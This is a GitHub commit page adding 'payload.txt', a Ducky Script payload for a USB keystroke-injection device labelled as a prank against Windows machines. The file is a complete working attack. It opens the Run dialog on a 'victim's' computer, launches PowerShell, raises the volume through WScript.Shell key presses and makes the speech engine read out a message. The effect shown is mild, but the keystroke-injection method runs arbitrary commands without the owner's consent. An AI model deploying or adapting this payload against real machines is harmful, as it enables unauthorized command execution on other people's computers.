Create payload.txt

pull/8/head
Keld Norman 2021-10-18 22:05:28 +02:00 committed by GitHub
parent 9328e12697
commit 80f8d8e2e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
#-----------------------------------------------------------------------------------------------------------
# Title: Speaking cable
# Description: Turn up the volumen and play a message on a victims computer using Windows build speach engine
# Author: Keld Norman / Twitter: @keld_norman
# Props: Google, RTFM, and trial and errors
# Version: 1.0
# Category: Prank
# Target: Windows10+ Powershell
# Attackmodes: HID
#-----------------------------------------------------------------------------------------------------------
# Quick Guide
#-----------------------------------------------------------------------------------------------------------
DUCKY_LANG US
GUI r
DELAY 1000
STRING Powershell
ENTER
DELAY 500
STRING $key=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $key;$i++){$obj.SendKeys([char] 175)}
ENTER
DELAY 500
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 500
STRING $sp.Speak("Hey everybody! I stole someones phone charger cable.")
ENTER
STRING exit
ENTER